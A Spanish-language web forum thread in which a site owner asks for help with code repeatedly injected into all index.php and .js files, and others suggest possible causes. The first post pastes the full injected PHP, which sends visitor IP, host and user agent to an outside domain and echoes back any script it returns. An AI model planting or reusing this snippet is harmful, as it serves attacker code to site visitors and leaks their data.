me inyectan código en todos los archivos index.php

Juan_Carlos_Canta · #1 (**permalink**) 09/12/2014, 12:24

Hola a todos/as,

Tengo un problema que no soy capaz de solucionar y es que me inyectan un código en todos los index.php (cuando esto sucede se aparece el código en todos los index).

he cambiado incluso los permisos al archivo CMOD 400 (solo lectura), pero de vez en cuando me inyectan el puñetero código.

El código es el siguiente (copio-pego):
=========================
<?php
#2eea78#
error_reporting(0); @ini_set('display_errors',0); $wp_wjag105 = @$_SERVER['HTTP_USER_AGENT']; if (( preg_match ('/Gecko|MSIE/i', $wp_wjag105) && !preg_match ('/bot/i', $wp_wjag105))){
$wp_wjag09105="http://"."error"."class".".com/class"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_wjag105);
if (function_exists('curl_init') && function_exists('curl_exec')) {$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_wjag09105); curl_setopt ($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$wp_105wjag = curl_exec ($ch); curl_close($ch);} elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) {$wp_105wjag = @file_get_contents($wp_wjag09105);}
elseif (function_exists('fopen') && function_exists('stream_get_contents')) {$wp_105wjag=@stream_get_contents(@fopen($wp_wjag0 9105, "r"));}}
if (substr($wp_105wjag,1,3) === 'scr'){ echo $wp_105wjag; }
#/2eea78#
?>
=========================

Si alguien sabe de alguna solución o le ha pasado algo similar y lo ha solucionado, le agradezco de antemano la ayuda.

Djoaq · #2 (**permalink**) 09/12/2014, 13:55

Hola , es curioso pero hasta donde yo se , deberías :

Comprobar todos los formularios de datos que tengas y sanitizar todos los datos que tengas te lleguen de los usuarios y ...

Reescribir todas las partes de tu código que lleven la función eval!

te dejo un link que te arrojará algo más de luz!

http://www.el-palomo.com/2013/04/no-...ode-injection/

Y en inglés , la parte más importante :

After all code that uses eval() has been rewritten, disable eval() and the "e" modifier for preg_replace() by installing the Suhosin hardened PHP patch and configuring it using "suhosin.executor.disable_eval" and "suhosin.executor.disable_emodifier" directives in the php.ini file (I wrote a separate blog on configuring the php.ini file).. This will help purge all eval() from your application and will break virtually all obfuscated malicious PHP code and many common backdoors.

Por cierto sino me equivoco ese código que te inyectan tiene como fin leer tu web y creo que hacer un man in the middle..
Un saludo !

Suerte!

Juan_Carlos_Canta · #3 (**permalink**) 10/12/2014, 05:38

Gracias Djoaq por la respuesta.

He estado revisando la documentación que me indicas y la verdad es que me he quedado casi igual...

¿No hay algo escrito para evitar esa inyección de código o que indiquen paso a paso como hacerlo?

A lo mejor en los enlaces que has indicado lo pone claro, pero sinceramente me pierdo...

Gracias de nuevo Djoaq

nfo · #4 (**permalink**) 10/12/2014, 06:05

es un joomla lo que tienes ???, asegurate de que en el server no tiene metido algun script que haga modificar ese fichero php.

Juan_Carlos_Canta · #5 (**permalink**) 10/12/2014, 06:11

NO nfo, es un php propio.

No he detectado ningún script en el server que pueda modificar contenidos.

Algo que no mencioné en el inicio de la pregunta es que además de escribir condigo en todos los index.php también lo hace en los archivos .js

Gracias.

nfo · #6 (**permalink**) 10/12/2014, 06:18

te preguntaba eso porque a mi me paso con joomla, y si, modificaba todos los index.php de cualquier carpeta y los js, en mi caso lo resolví quitando los asquerosos flash que hicieron en el proyecto "ya que no era mi el proyecto" modifique los permisos, Antes me aseguré de que el server no estuviera infectadillo y esas cosas. revise todos los php, por si hubiera algún script que hiciera modificar los index, pero no encontre nada, al eliminar los flash ya dejo de modificarse curioso

Tienes algún tipo de conteo de estadisticas webstast o algo asi ?????

loncho_rojas · #7 (**permalink**) 10/12/2014, 07:31

Si usas contadores de visita gratuitos o similares podría ser tu problema... tal vez sea que estés utilizando un host de dudosa procedencia... de otra, es complicado que te inserten código de por si... o hay algo que no nos haz contado...

Juan_Carlos_Canta · #8 (**permalink**) 10/12/2014, 10:44

Antes de nada, agradeceros vuestras respuestas.

Dicho esto, os diré que NO utiliza ningún swf de flash, NO utiliza contadores y en cuanto al server donde tengo alojada la Web, es un hosting de pago (lo tengo en Arsys).

Me pasa lo mismo que le ocurría a nfo pero no uso ningún administrador de contenidos tipo joomla.

Esto me ha pasado en reiteradas ocasiones y para solucionarlo cambio los archivos "inyectados" por los originales y todo se queda OK, pero cada X tiempo vuelve a pasar y es una lata andar cambiado archivos... y lo que más me molesta es que no veo donde está el problema !!!